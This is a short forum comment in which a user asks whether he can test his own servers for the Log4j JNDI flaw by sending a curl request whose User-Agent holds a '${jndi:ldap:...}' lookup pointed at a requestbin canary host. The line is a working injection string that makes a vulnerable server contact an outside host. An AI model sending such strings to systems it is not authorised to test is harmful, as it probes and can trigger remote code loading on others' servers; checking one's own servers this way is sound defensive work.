|
|
|
|
|
|
by philh
1652 days ago
|
|
|
Like, my understanding from reading the thread was that I'd be able to run this and make requests to my servers setting my User-Agent, like curl -A '${jndi:ldap:test.a54c4d391bad1b48ebc3.d.requestbin.net/abc}' https://my-service.net
and if they're vulnerable (at least through logging user-agents, I know there are other possible avenues) something would show up on the website. Is it more complicated than that? |
|
|